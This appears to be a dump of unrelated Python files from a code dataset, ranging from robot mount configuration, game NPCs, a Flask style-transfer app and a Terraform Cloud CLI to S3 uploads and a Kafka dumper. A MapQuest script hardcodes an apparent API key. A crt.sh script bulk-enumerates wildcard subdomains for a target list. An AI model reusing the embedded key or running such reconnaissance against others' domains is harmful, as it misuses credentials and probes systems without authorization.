            riser: List[PACS.Riser] = DEFAULTS[RISER],
            sick_stand: List[SICKStand] = DEFAULTS[SICK],
            post: List[Post] = DEFAULTS[POST],
            disk: List[Disk] = DEFAULTS[DISK],
            ) -> None:
        # NOTE: the mutable defaults above are kept for interface
        # compatibility; the setters only iterate them, never mutate.
        # Initialization
        self.bracket = bracket
        self.fath_pivot = fath_pivot
        self.riser = riser
        self.sick_stand = sick_stand
        self.post = post
        self.disk = disk
        # Template
        template = {
            self.KEYS[self.BRACKET]: MountsConfig.bracket,
            self.KEYS[self.FATH_PIVOT]: MountsConfig.fath_pivot,
            self.KEYS[self.RISER]: MountsConfig.riser,
            self.KEYS[self.SICK]: MountsConfig.sick_stand,
            self.KEYS[self.POST]: MountsConfig.post,
            self.KEYS[self.DISK]: MountsConfig.disk,
        }
        super().__init__(template, config, self.MOUNTS)

    @staticmethod
    def _as_mount_list(value: List[dict], factory) -> MountListConfig:
        """Validate a list of mount dicts and build a MountListConfig.

        factory: zero-argument callable returning an empty mount instance
        to be populated via ``from_dict``. Raises AssertionError when
        *value* is not a list of dicts.
        """
        assert isinstance(value, list), (
            "Mounts must be list of 'dict'")
        assert all([isinstance(i, dict) for i in value]), (
            "Mounts must be list of 'dict'")
        mounts = MountListConfig()
        mount_list = []
        for d in value:
            mount = factory()
            mount.from_dict(d)
            mount_list.append(mount)
        mounts.set_all(mount_list)
        return mounts

    @property
    def bracket(self) -> OrderedListConfig:
        """PACS bracket mounts; getter refreshes the serialized config."""
        self.set_config_param(
            key=self.KEYS[self.BRACKET],
            value=self._bracket.to_dict()
        )
        return self._bracket

    @bracket.setter
    def bracket(self, value: List[dict]) -> None:
        self._bracket = self._as_mount_list(value, PACS.Bracket)

    @property
    def riser(self) -> OrderedListConfig:
        """PACS riser mounts; getter refreshes the serialized config."""
        self.set_config_param(
            key=self.KEYS[self.RISER],
            value=self._riser.to_dict()
        )
        return self._riser

    @riser.setter
    def riser(self, value: List[dict]) -> None:
        # Risers need a minimal 1x1 grid before from_dict fills them in.
        self._riser = self._as_mount_list(
            value, lambda: PACS.Riser(rows=1, columns=1))

    @property
    def fath_pivot(self) -> OrderedListConfig:
        """Fath pivot mounts; getter refreshes the serialized config."""
        self.set_config_param(
            key=self.KEYS[self.FATH_PIVOT],
            value=self._fath_pivot.to_dict()
        )
        return self._fath_pivot

    @fath_pivot.setter
    def fath_pivot(self, value: List[dict]) -> None:
        self._fath_pivot = self._as_mount_list(value, FathPivot)

    @property
    def sick_stand(self) -> OrderedListConfig:
        """SICK stand mounts; getter refreshes the serialized config."""
        self.set_config_param(
            key=self.KEYS[self.SICK],
            value=self._sick.to_dict()
        )
        return self._sick

    @sick_stand.setter
    def sick_stand(self, value: List[dict]) -> None:
        self._sick = self._as_mount_list(value, SICKStand)

    @property
    def post(self) -> OrderedListConfig:
        """Post mounts; getter refreshes the serialized config."""
        self.set_config_param(
            key=self.KEYS[self.POST],
            value=self._post.to_dict()
        )
        return self._post

    @post.setter
    def post(self, value: List[dict]) -> None:
        self._post = self._as_mount_list(value, Post)

    @property
    def disk(self) -> OrderedListConfig:
        """Disk mounts; getter refreshes the serialized config."""
        self.set_config_param(
            key=self.KEYS[self.DISK],
            value=self._disk.to_dict()
        )
        return self._disk

    @disk.setter
    def disk(self, value: List[dict]) -> None:
        self._disk = self._as_mount_list(value, Disk)

    # Get All Mounts
    def get_all_mounts(self) -> List[BaseMount]:
        """Return every configured mount, grouped by type."""
        mounts = []
        mounts.extend(self.fath_pivot.get_all())
        mounts.extend(self.riser.get_all())
        mounts.extend(self.bracket.get_all())
        mounts.extend(self.sick_stand.get_all())
        mounts.extend(self.post.get_all())
        mounts.extend(self.disk.get_all())
        return mounts
| clearpathrobotics/clearpath_config | clearpath_config/mounts/mounts.py | mounts.py | py | 7,899 | python | en | code | 1 | github-code | 36 |
36094711488 | from merchant import Merchant
from enemy import Enemy
from monster import Monster
# Roster of every NPC in the game, keyed by display name.
# NOTE(review): positional constructor arguments follow the signatures in
# merchant.py / enemy.py / monster.py -- confirm meanings there.
characters = {
    "Gary": Merchant("Gary", None, 50, 12, 15000, 10, 3, "Here to buy and sell goods."),
    "Rebecca": Merchant("Rebecca", None, 15, 7, 200, 1, 1, "Here to buy and sell goods"),
    "Thug": Enemy("Thug", None, 180, 7, 5, 1, 1, "Looks kind of menacing.", 10),
    "Goblin": Monster("Goblin", None, 150, 7, 2, 1, 1, "Just a filthy, green goblin", ['bite', 'scratch'], 5),
    "Troll": Monster("Troll", None, 250, 4, 2, 10, 7, "Yikes, a troll...", ['clobber'], 50),
    "Imp": Monster("Imp", None, 70, 5, 2, 1, 1, "Full of mischeif", ['bite', 'scratch'], 5),
    "Hydra": Monster("Hydra", None, 2500, 50, 25, 10, 25, "If the legends are true, I don't want to fight this.", ['strike', 'wrap'], 100),
    "Weapons Master": Enemy("Weapons Master", None, 2000, 75, 52, 100, 91, "The renowned weapons expert. I'd hate to be in a dual with him.", 2500),
    "Dragon": Monster("Dragon", None, 5000, 100, 2000, 150, 75, "Well, there's the treasure...and unfortunately the dragon.", ['fire breath', 'stomp', 'strike', 'chomp'], 5000)
}

# Stock the merchants' shops.
characters["Gary"].spawn_inventory("iron dagger")
characters["Gary"].spawn_inventory("steel dagger")
characters["Gary"].spawn_inventory("rusty iron armor")
characters["Gary"].spawn_inventory("iron armor")
characters["Gary"].spawn_inventory("steel armor")
characters["Gary"].spawn_inventory("plasma cutter")
characters["Rebecca"].spawn_inventory("book: zap")
characters["Rebecca"].spawn_inventory("book: burn")
characters["Rebecca"].spawn_inventory("book: chill")
characters["Rebecca"].spawn_inventory("book: ensnare")
characters["Rebecca"].spawn_inventory("book: summon")

# Give hostile characters their carried items, rare drops, and loot.
characters["Thug"].spawn_item("iron dagger")
characters["Thug"].spawn_rare_item("steel dagger")
characters["Imp"].spawn_rare_item("sapphire")
characters["Troll"].spawn_item("ruby")
characters["Troll"].spawn_loot("club")
characters["Weapons Master"].spawn_loot("steel sword")
characters["Weapons Master"].spawn_loot("steel armor")
characters["Hydra"].spawn_loot("diamond")
def return_invalid():
    """Inform the player that the chosen target does not exist."""
    print("Invalid target")
def is_character(target):
    """Return True when *target* names a known NPC; otherwise warn and return None."""
    if target not in characters:
        return_invalid()
        return None
    return True
def validate_barter(target):
    """Return True when *target* is a known Merchant NPC.

    On an unknown target, "Invalid target" is printed twice (once by
    is_character, once here) to match the original control flow; known
    non-merchants yield None.
    """
    known = is_character(target) == True
    if not known:
        return_invalid()
        return None
    if isinstance(characters[target], Merchant):
        return True
    return None
def validate_battle(target):
    """Return True when *target* is a known Enemy or Monster NPC.

    Fixes the original check, which called isinstance(target, Monster) on
    the name *string* instead of the character object, so pure-Monster NPCs
    were never recognized unless Monster subclasses Enemy.
    """
    if is_character(target) == True:
        if isinstance(characters[target], (Enemy, Monster)):
            return True
    else:
        return_invalid()
| wildcard329/python_game | npc_roster.py | npc_roster.py | py | 2,643 | python | en | code | 0 | github-code | 36 |
5232319809 | from openpyxl import Workbook
# Build a grade workbook: write raw scores, normalize quiz 2, then add a
# total-score formula and a letter grade per student.
wb = Workbook()
ws = wb.active

# [Final grade data compiled so far]
# Columns: student id, attendance, quiz1, quiz2, midterm, final, project.
data = [["학번", "출석", "퀴즈1", "퀴즈2", "중간고사", "기말고사", "프로젝트"],
        [1,10,8,5,14,26,12],
        [2,7,3,7,15,24,18],
        [3,9,5,8,8,12,4],
        [4,7,8,7,17,21,18],
        [5,7,8,7,16,25,15],
        [6,3,5,8,8,17,0],
        [7,4,9,10,16,27,18],
        [8,6,6,6,15,19,17],
        [9,10,10,9,19,30,19],
        [10,9,8,8,20,25,20]]

# Write the table into the sheet (cells are 1-indexed).
for x in range(1, len(data)+1) :
    for y in range(1, len(data[0])+1):
        ws.cell(row=x, column=y, value=data[x-1][y-1])

# 1. Overwrite every quiz-2 score (column D) with 10
for idx, cell in enumerate(ws["D"]):
    if idx == 0: # skip the header row
        continue
    cell.value = 10

# 2. Add total-score and grade columns
ws["H1"] = "총점"
ws["I1"] = "성적"
for idx, score in enumerate(data, start=1):
    if idx == 1:
        continue
    # Total computed in Python, compensating for the quiz-2 fix above
    # (subtract the old quiz-2 value, add the new 10).
    sum_val = sum(score[1:]) - score[3] + 10 # total
    # The sheet cell itself holds a live SUM formula over the row.
    ws.cell(row=idx, column=8).value="=SUM(B{}:G{})".format(idx, idx)

    # Assign a letter grade from the total
    grade = None
    if sum_val >= 90:
        grade = "A"
    elif sum_val >= 80:
        grade = "B"
    elif sum_val >= 70:
        grade = "C"
    else:
        grade = "D"

    # F when attendance is below 5, regardless of total
    if score[1] < 5:
        grade = "F"

    ws.cell(row=idx, column=9).value = grade

wb.save("scores.xlsx")
33039113496 | from mc.net.minecraft.mob.ai.BasicAttackAI import BasicAttackAI
class JumpAttackAI(BasicAttackAI):
    """Attack AI that lunges at its target with a forward leap."""

    def __init__(self):
        super().__init__()
        # Move much faster than the base attack AI.
        self.runSpeed *= 8.0

    def _jumpFromGround(self):
        """Leap forward and up while attacking; jump normally otherwise."""
        if self.attackTarget:
            # Cancel horizontal drift, then launch forward and upward.
            self.mob.xd = 0.0
            self.mob.zd = 0.0
            self.mob.moveRelative(0.0, 1.0, 0.6)
            self.mob.yd = 0.5
        else:
            super()._jumpFromGround()
14198442268 | import os
from flask import Flask, render_template, request
import base64
from io import BytesIO
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import src.components.data_ingestion as DI
from src.components.model_trainer import modelTrain
from werkzeug.utils import secure_filename
app = Flask(__name__)
# User-uploaded images are stored under static/uploads (created on demand).
app.config["UPLOAD_FOLDER"] = os.path.abspath(os.path.join(os.path.dirname(__file__), 'static', 'uploads'))

# Default bundled content/style image directories from the data-ingestion module.
content_dir = DI.default_content_dir
style_dir = DI.default_style_dir
@app.route('/')
def index():
    """Render the gallery page listing bundled content and style images.

    Fixes the original filter: ``f.endswith('.jpg' or '.png' or '.jpeg')``
    evaluates to ``f.endswith('.jpg')`` because ``or`` on non-empty strings
    returns the first operand -- .png/.jpeg files were silently dropped.
    """
    image_exts = ('.jpg', '.png', '.jpeg')
    content_images = [f for f in os.listdir(content_dir) if f.endswith(image_exts)]
    style_images = [f for f in os.listdir(style_dir) if f.endswith(image_exts)]
    return render_template('index.html', content_images=content_images, style_images=style_images)
def _save_upload(upload):
    """Persist an uploaded file into UPLOAD_FOLDER and return its path."""
    filename = secure_filename(upload.filename)
    path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
    os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
    upload.save(path)
    return path


@app.route('/transfer', methods=['POST'])
def transfer_style():
    """Run neural style transfer with the user's parameters and show the result.

    The four imageSource branches previously duplicated the upload-saving
    code; it is factored into _save_upload. An unrecognized imageSource
    leaves the paths unset and raises, matching the original behavior.
    """
    # Retrieve user input from the form
    epochs = int(request.form['epochs'])
    learning_rate = float(request.form['learningRate'])
    alpha = float(request.form['alpha'])
    beta = float(request.form['beta'])
    selected_source = request.form.get("imageSource")
    content_image = request.form.get('contentImage')
    style_image = request.form.get('styleImage')

    # Resolve content/style image paths according to the selected source.
    if selected_source == 'default':
        content_image_path = os.path.join(content_dir, content_image)
        style_image_path = os.path.join(style_dir, style_image)
    elif selected_source == 'custom_image':
        content_image_path = _save_upload(request.files.get('customContentImage'))
        style_image_path = os.path.join(style_dir, style_image)
    elif selected_source == 'custom_style':
        style_image_path = _save_upload(request.files.get('customStyleImage'))
        content_image_path = os.path.join(content_dir, content_image)
    elif selected_source == 'custom':
        content_image_path = _save_upload(request.files.get('customContentImage'))
        style_image_path = _save_upload(request.files.get('customStyleImage'))

    # Perform style transfer
    test = modelTrain(content_image_path, style_image_path)
    generated_image = test.train(epochs=epochs, lr=learning_rate, alpha=alpha, beta=beta)

    # Convert the generated image to base64 and pass it to the template
    buffer = BytesIO()
    plt.imshow(generated_image)
    plt.axis('off')
    plt.savefig(buffer, format='png', bbox_inches='tight', pad_inches=0)
    buffer.seek(0)
    img_str = base64.b64encode(buffer.getvalue()).decode('utf-8')

    return render_template('result.html', img_data=img_str)
if __name__ == "__main__":
app.run(debug=True)
| al0nkr/style-transfer-nn | app.py | app.py | py | 3,973 | python | en | code | 0 | github-code | 36 |
11867021952 | # -----------------------------------------------------------------------------
# main.py
#
# Hung-Ruey Chen 109971346
# -----------------------------------------------------------------------------
import sys, os
import ply.lex as lex
import ply.yacc as yacc
from token_def import *
# Build the lexer
def main():
    """Lex, parse, and execute the program file named in sys.argv[1].

    Uses `logging` consistently (the original first line called the
    undefined name ``log``), reads the source through a context manager,
    and closes the devnull handle used to silence ply's table warnings.
    """
    logging.debug(sys.argv[1])
    # Silence ply's table-generation warnings while building lexer/parser.
    devnull = open(os.devnull, 'w')
    sys.stderr = devnull
    lex.lex()
    yacc.yacc()
    sys.stderr = sys.__stderr__
    devnull.close()
    # Read the program: one stripped source line per newline.
    code = ""
    with open(sys.argv[1]) as source:
        for line in source:
            code += line.strip() + "\n"
    logging.debug(code)
    try:
        # Debug pass: tokenize the whole input and log each token.
        lex.input(code)
        while True:
            token = lex.token()
            if not token: break
            logging.debug(token)
        # Parse into an AST and run it.
        ast = yacc.parse(code)
        ast.execute()
    except Exception as e:
        logging.debug(e)
if __name__ == '__main__':
    # Interpret the file given as the first command-line argument.
    main()
12177872909 | import requests
import urllib.parse
main_api = "https://www.mapquestapi.com/directions/v2/route?"
key = "p0Modq3JoAtVS6BXK5P5CinXWhJNUQwI"
while True:
orig = input("Starting Location: ")
dest = input("Destination: ")
url = main_api + urllib.parse.urlencode({
"key" : key,
"from" : orig,
"to" : dest
})
json_data = requests.get(url).json()
json_status = json_data["info"]["statuscode"]
print(f"URL: {url}")
if json_status == 0:
print(f"API Status: {json_status} = A successfull route call.\n") | JerickoDeGuzman/MapQuest-Feature-Enhancement | tempdir/referenceFiles/mapquest_parse-json_3.py | mapquest_parse-json_3.py | py | 561 | python | en | code | 0 | github-code | 36 |
8473901690 | #!/usr/bin/env python3
############
## https://gist.github.com/DevBOFH/7bd65dbcb945cdfce42d21b1b6bc0e1b
############
##
##
description = 'Terraform workspace tool. This tool can be used to perform CRUD operations on Terraform Cloud via their public API.'
version = "0.0.1"
import os
import re
import sys
import requests
import argparse
import json
ORGANIZATION = "TF_CLOUD_ORG_NAME"
HEADERS = {"Content-Type": "application/vnd.api+json"}
def load_api_credentials(rc_path="~/.terraformrc"):
with open(os.path.expanduser(rc_path)) as f:
m = re.search(r'token = "([^"]+)"', f.read())
if not m:
raise RuntimeError(f"Unable to load credentials from {rc_path}")
else:
HEADERS["Authorization"] = f"Bearer {m.group(1)}"
def new_workspace(workspace_name):
    """Create a workspace in the organization; exits with code 2 on HTTP error."""
    body = {'data': {'attributes': {'name': workspace_name}, 'type': 'workspaces'}}
    response = requests.post(
        f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces",
        json=body,
        headers=HEADERS,
    )
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError as err:
        print(str(err))
        sys.exit(2)
def show_workspace(workspace_name):
    """Fetch a workspace and pretty-print its JSON; exits 0 silently on HTTP error."""
    response = requests.get(
        f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
        headers=HEADERS,
    )
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError:
        sys.exit(0)
    print(json.dumps(json.loads(response.text), indent=2))
def configure_workspace_by_name(workspace_name):
    """Switch the named workspace to local execution; exits 2 on HTTP error."""
    body = {"data": {"type": "workspaces", "attributes": {"operations": False}}}
    response = requests.patch(
        f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
        json=body,
        headers=HEADERS,
    )
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError as err:
        print(str(err))
        sys.exit(2)
def configure_workspace_by_id(workspace_id):
    """Switch the workspace with this id to local execution; exits 2 on HTTP error."""
    body = {"data": {"type": "workspaces", "attributes": {"operations": False}}}
    response = requests.patch(
        f"https://app.terraform.io/api/v2/workspaces/{workspace_id}",
        json=body,
        headers=HEADERS,
    )
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError as err:
        print(str(err))
        sys.exit(2)
def configure_all_workspaces():
    """Walk every page of the org's workspaces, setting each to local execution."""
    next_page = "https://app.terraform.io/api/v2/organizations/" + ORGANIZATION + "/workspaces"
    while next_page:
        page = requests.get(next_page, headers=HEADERS).json()
        for entry in page["data"]:
            ws_id = entry["id"]
            ws_name = entry["attributes"]["name"]
            print(f"Updating {ws_name}")
            try:
                configure_workspace_by_id(entry["id"])
            except requests.exceptions.HTTPError as exc:
                # Report and continue with the remaining workspaces.
                print(f"Error updating {ws_id} {ws_name}: {exc}", file=sys.stderr)
        # Follow the pagination link; None terminates the loop.
        next_page = page["links"].get("next")
def delete_workspace(workspace_name):
    """Delete a workspace by name; exits with code 2 on HTTP error.

    The original built an unused create-style PAYLOAD dict; a DELETE
    request takes no body, so it has been removed.
    """
    req = requests.delete(
        f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
        headers=HEADERS,
    )
    try:
        req.raise_for_status()
    except requests.exceptions.HTTPError as err:
        print(str(err))
        sys.exit(2)
if __name__ == "__main__":
# init argparse
parser = argparse.ArgumentParser(description = description)
parser.add_argument("-V", "--version", help="show version", action="store_true")
parser.add_argument("-n", "--new", help="create a new workspace")
parser.add_argument("-c", "--configure", help="configure a workspace to use local execution mode")
parser.add_argument("-ca", "--configureall", help="configure all workspaces to use local execution mode", action="store_true")
parser.add_argument("-d", "--delete", help="delete a workspace")
parser.add_argument("-s", "--show", help="show details of a workspace")
# read arguments from the command line
args = parser.parse_args()
# load terraform cloud api token
load_api_credentials()
# check for --version or -V
if args.version:
print("Terraform Workspace Tool " + version )
# check for --new or -n
if args.new:
try:
new_workspace(args.new)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --show or -s
if args.show:
try:
show_workspace(args.show)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --configure or -c
if args.configure:
try:
configure_workspace_by_name(args.configure)
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --configureall or -ca
if args.configureall:
try:
configure_all_workspaces()
except AssertionError as err:
print (str(err))
sys.exit(2)
# check for --delete or -d
if args.delete:
try:
delete_workspace(args.delete)
except AssertionError as err:
print (str(err))
sys.exit(2)
####################################
##
##
| babywyrm/sysadmin | terraform/tf_workspace_.py | tf_workspace_.py | py | 5,404 | python | en | code | 10 | github-code | 36 |
44771319776 | def extract_info(book_list):
result = []
for book in book_list:
title = book.find("a", {"class" : "N=a:bta.title"}).string
image = book.find("img")["src"]
link = book.find("div", {"class" : "thumb_type thumb_type2"}).find("a")["href"]
author = book.find("a",{"class" : "txt_name N=a:bta.author"}).string
publisher = book.find("a", {"class" : "N=a:bta.publisher"}).text
# price_box = book.find("em",{"class" : "price"}).text.strip()
# if price != None:
# pirce = price_box.string
# else:
# price = '없음'
book_info = {
'title' : title,
'image' : image,
'link' : link,
'author' : author,
'publisher' : publisher,
# 'price_box' : price_box,
}
result.append(book_info)
return result
print(result) | sumins2/homework | session09_crawling/book.py | book.py | py | 959 | python | en | code | 0 | github-code | 36 |
16209163559 | import datetime
import os
import random
import string
from datetime import datetime
import requests
from boto3 import Session
from django.conf import settings
from django.conf.global_settings import MEDIA_ROOT
from market_backend.apps.accounts.models import Media
from market_backend.v0.accounts import serializers
class AccountsUtils:
    """
    Utility methods related to Accounts Application
    """

    @staticmethod
    def get_user_full_name(user):
        """Return a display name for a user, or ' / '-joined names for a list.

        Each entry is "first last" when either name is set, otherwise the
        username up to '@'. Fixes the original list branch, which appended
        the username even when a real name had already been appended,
        producing entries like "Jane Doejdoe".
        """
        if isinstance(user, list):
            names = []
            for item in user:
                if item.first_name or item.last_name:
                    names.append("{} {}".format(item.first_name, item.last_name))
                else:
                    names.append("{}".format(item.username.split('@')[0]))
            return ' / '.join(names)
        if user.first_name or user.last_name:
            return "{} {}".format(user.first_name, user.last_name)
        return "{}".format(user.username.split('@')[0])

    @staticmethod
    def get_readable_user_type(type):
        """Turn an enum-style type (e.g. 'SUPER_ADMIN') into 'Super admin'."""
        return type.replace('_', ' ').lower().capitalize()
class FileUploadUtils(object):
    """Helpers for uploading, naming, and deleting files stored in S3.

    Fixes ``upload_file_by_file``: the file imports both ``import datetime``
    and, later, ``from datetime import datetime`` -- the latter rebinds the
    name to the class, so ``datetime.datetime.now()`` raised AttributeError.
    """

    @staticmethod
    def getFileKey():
        """Return a random 50-character alphanumeric S3 object key.

        NOTE(review): uses ``random``; ``secrets`` would be preferable if
        these keys must be unguessable.
        """
        return ''.join(
            random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(50))

    @staticmethod
    def deleteFile(key):
        """Delete the Media row with this id and its S3 object.

        Returns the S3 delete_objects response.
        """
        media = Media.objects.get(id=key)
        session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
                          aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
                          region_name=settings.AWS_REGION_NAME)
        s3 = session.resource('s3')
        my_bucket = s3.Bucket(settings.AWS_BUCKET_NAME)
        response = my_bucket.delete_objects(
            Delete={
                'Objects': [
                    {
                        'Key': media.key
                    }
                ]
            }
        )
        media.delete()
        return response

    @staticmethod
    def getFileName(key):
        """Return the stored file name for an S3 key, or None when missing."""
        try:
            file = Media.objects.get(key=key)
            return file.file_name
        except Exception as e:
            print(e)
            return None

    @staticmethod
    def getContentType(extension, url=None):
        """Map a file extension to a MIME type.

        NOTE(review): unknown extensions fall back to 'image/jpeg', so this
        never returns None and the valid_file check in uploadFile can never
        fail -- confirm that fallback is intended. *url* is unused but kept
        for interface compatibility.
        """
        if extension == 'pdf':
            return 'application/pdf'
        elif extension == 'png':
            return 'image/png'
        elif extension == 'jpeg' or extension == 'jpg':
            return 'image/jpeg'
        else:
            return 'image/jpeg'

    @staticmethod
    def uploadFile(url):
        """Download *url*, upload it to S3, record a Media row, return it.

        The temporary local copy under MEDIA_ROOT is removed after upload.
        Returns None when the Media serializer rejects the record.
        """
        filename = url.split("/")[-1]
        fileextension = filename.split('.')[1]
        file = requests.get(url).content
        filepath = os.path.join(MEDIA_ROOT, filename)
        with open(filepath, 'wb') as destination:
            destination.write(file)
        file = open(filepath, 'rb')
        extension = FileUploadUtils.getContentType(fileextension)
        valid_file = True
        if extension is None:
            valid_file = False
        session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
                          aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
                          region_name=settings.AWS_REGION_NAME)
        s3 = session.resource('s3')
        file_key = FileUploadUtils.getFileKey()
        if valid_file:
            res = s3.Bucket(settings.AWS_BUCKET_NAME).put_object(Key=file_key, Body=file, ContentType=extension,
                                                                 ACL='public-read')
        data = {'key': file_key, 'file_name': filename, 'is_link': True}
        serializer = serializers.CreateFileUploadSerializer(data=data)
        if serializer.is_valid():
            serializer.save()
            if os.path.isfile(filepath):
                os.remove(filepath)
            media = Media.objects.get(key=file_key)
            return media
        else:
            return None

    @staticmethod
    def upload_file_by_file(file):
        """Upload an in-memory PDF to S3 and record/return its Media row.

        The stored file name is derived from the current timestamp.
        """
        # Fixed: the module-level ``from datetime import datetime`` shadows
        # the datetime module, so datetime.datetime.now() was an error.
        timestamp = str(datetime.now())
        filename = timestamp + '.pdf'
        print(file)
        session = Session(aws_access_key_id=settings.AWS_ACCESS_KEY,
                          aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
                          region_name=settings.AWS_REGION_NAME)
        s3 = session.resource('s3')
        file_key = FileUploadUtils.getFileKey()
        res = s3.Bucket(settings.AWS_BUCKET_NAME).put_object(Key=file_key, Body=file, ContentType='application/pdf',
                                                             ACL='public-read')
        data = {'key': file_key, 'file_name': filename, 'is_link': False}
        serializer = serializers.CreateFileUploadSerializer(data=data)
        if serializer.is_valid():
            serializer.save()
        media = Media.objects.get(key=file_key)
        return media

    @staticmethod
    def get_url_from_media_object(media):
        """Return the public S3 URL for a Media row."""
        return settings.AWS_S3_BASE_LINK + media.key
| muthukumar4999/market-backend | market_backend/v0/accounts/utils.py | utils.py | py | 5,060 | python | en | code | 0 | github-code | 36 |
41924245365 | from .sentence_cutting import cutting_500_under
import requests, json
def cleaned_result(final_result):
    """Convert Naver spell-checker markup into inline-styled HTML fragments.

    Splits the checker output on '<br>', maps each correction CSS class to
    an inline color style, unescapes &quot;/&#39; entities, and wraps any
    fragment that contains no span in a plain <span>. Returns the list of
    fragments. (Rewritten from an index-mutating range(len(...)) loop to a
    table-driven replacement loop.)
    """
    # Checker CSS classes -> inline color styles, plus entity unescapes.
    replacements = [
        ("<span class='red_text'>", '<span style="color:#CC0000">'),    # wrong spelling
        ("<span class='green_text'>", '<span style="color:#00CC00">'),  # wrong spacing
        ("<span class='violet_text'>", '<span style="color:#CC00CC">'), # ambiguous
        ("<span class='blue_text'>", '<span style="color:#3B78FF">'),   # statistical correction
        ("&quot;", '"'),
        ("&#39;", "'"),
    ]
    result = []
    for fragment in final_result.split('<br>'):
        for old, new in replacements:
            fragment = fragment.replace(old, new)
        if "<span" not in fragment:
            fragment = f"<span>{fragment}</span>"
        result.append(fragment)
    return result
def check(text):
    """Run *text* through Naver's spell checker and return corrected HTML.

    Texts longer than 500 characters are split with cutting_500_under,
    corrected piecewise, and re-joined with '<br>'. The per-request logic
    (payload, headers, JSONP unwrapping) was duplicated in both branches
    and is factored into the _correct closure.
    """
    base_url = 'https://m.search.naver.com/p/csearch/ocontent/spellchecker.nhn'
    _agent = requests.Session()

    def _correct(sentence):
        # One spell-check round trip for a single <=500-char sentence.
        payload = {
            '_callback': 'window.__jindo2_callback._spellingCheck_0',
            'q': sentence
        }
        headers = {
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
            'referer': 'https://search.naver.com/',
        }
        response = _agent.get(base_url, params=payload, headers=headers)
        # Strip the JSONP wrapper: 42 chars of callback prefix and ');' suffix.
        data = json.loads(response.text[42:-2])
        return data['message']['result']['html']

    if len(text) > 500:
        return '<br>'.join(_correct(sentence) for sentence in cutting_500_under(text))
    return _correct(text)
75263396265 | import requests
from urllib.parse import urlparse
import concurrent.futures
# Extract domain from a URL
def extract_domain(url):
    """Return the network location (host[:port]) portion of *url*."""
    parsed = urlparse(url)
    return parsed.netloc
# Fetch subdomains from crt.sh
def get_subdomains_from_crtsh(domain):
    """Query crt.sh certificate logs for *domain*; keep wildcard entries only.

    Returns [] on any request failure or non-200 response.
    """
    try:
        response = requests.get(f"https://crt.sh/?q=%.{domain}&output=json")
        if response.status_code != 200:
            return []
        return [cert['name_value'] for cert in response.json() if '*' in cert['name_value']]
    except requests.RequestException:
        return []
def main():
    """Collect wildcard subdomains for every domain listed in h1_web_fix1.txt.

    Queries crt.sh concurrently and writes results to wildcard_subdomains.txt.
    """
    with open('h1_web_fix1.txt', 'r') as handle:
        domains = [extract_domain(line.strip()) for line in handle.readlines()]

    collected = []
    # Fan the crt.sh lookups out across a thread pool.
    with concurrent.futures.ThreadPoolExecutor(max_workers=100) as pool:
        pending = {pool.submit(get_subdomains_from_crtsh, d): d for d in domains}
        for finished in concurrent.futures.as_completed(pending):
            collected.extend(finished.result())

    with open('wildcard_subdomains.txt', 'w') as out_file:
        for subdomain in collected:
            out_file.write(f"{subdomain}\n")

    print(f"Found {len(collected)} wildcard subdomains. Saved to wildcard_subdomains.txt.")
if __name__ == "__main__":
main()
| RepoRascal/test | run.py | run.py | py | 1,650 | python | en | code | 0 | github-code | 36 |
72753340263 | import json
import time
import os
import uuid
import argparse
from datetime import datetime, timedelta
from kafka import KafkaConsumer, SimpleConsumer
import os.path
import subprocess
def gzip_yesterday(yesterday):
    """Gzip yesterday's dump file if it exists.

    yesterday: date string in %Y%m%d form, used in the file name.
    Returns gzip's captured output, or None when the file does not exist.
    """
    out = None
    fname = args.target_folder + "/" + args.target_file + "_" + yesterday + ".json"
    if os.path.isfile(fname):
        # Build the argv list directly: the original joined "gzip__<path>"
        # and split on "__", which breaks for any path containing "__".
        out = subprocess.check_output(["gzip", fname])
    return out
def save():
    """Consume a Kafka topic forever, appending each message as a JSON line.

    Messages go to <target_folder>/<target_file>_<YYYYMMDD>.json for the
    current day; optionally gzips yesterday's file after each message.
    """
    # Kafka
    consumer = KafkaConsumer(bootstrap_servers=args.kafka_bootstrap_srvs, group_id=args.kafka_group_id)
    consumer.subscribe([args.kafka_source_topic])
    for msg in consumer:
        record = json.loads(msg.value)
        today = str(datetime.today())[0:10]
        yesterday = datetime.strftime(datetime.now() - timedelta(1), '%Y%m%d')
        out_path = args.target_folder + "/" + args.target_file + "_" + today.replace("-", "") + ".json"
        # Append one compact JSON document per line.
        with open(out_path, 'a') as out_file:
            out_file.write(json.dumps(record) + '\n')
        if args.gzip_yesterday == "yes":
            gzip_yesterday(yesterday)
if __name__ == '__main__':
    # CLI: all knobs have sensible localhost defaults for development.
    parser = argparse.ArgumentParser(description="Dump topic")
    parser.add_argument('--kafka_bootstrap_srvs', default="localhost:9092")
    parser.add_argument('--kafka_group_id', default="backup_topic")
    parser.add_argument('--kafka_source_topic', default="good")
    parser.add_argument('--target_folder', default="data")
    parser.add_argument('--target_file', default="good")
    parser.add_argument('--gzip_yesterday', default="yes")
    #
    # args is read as a module-level global by save()/gzip_yesterday().
    args = parser.parse_args()
    #
    save()
| goliasz/kafka2bigquery | src/main/python/dump_topic.py | dump_topic.py | py | 1,687 | python | en | code | 0 | github-code | 36 |
35876191865 | import sqlite3
from sqlite3 import Error
class Key:
